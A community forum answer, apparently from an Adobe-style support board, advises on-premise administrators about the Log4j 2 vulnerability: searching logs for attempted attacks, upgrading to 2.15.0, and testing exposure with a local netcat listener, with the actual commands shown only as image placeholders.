Avatar

Correct answer by
Community Advisor

Hi, for the all comunity memebers who work with on-premise solutions you can use the following code on your exposed servers (usualy tracking ones) to search the logs in order to see if attacks were tried:

Milan_Vucetic_0-1639295385808.png

Where posible upgrade you log4j 2 on latest 2.15.0 version

Nice way to see if you are exposed to this threat: Start netcat parallel to your app:

Milan_Vucetic_1-1639295413074.png

then type the following in the app where gets logged (ex. the query string of your search):

Milan_Vucetic_2-1639295438322.png

If you then see a lot of garbage emojies in the netcat console you are vulnerable!

Sorry about pictures above. Article just won't to accept any code even if code tags used.

 

Regards,

Milan

View solution in original post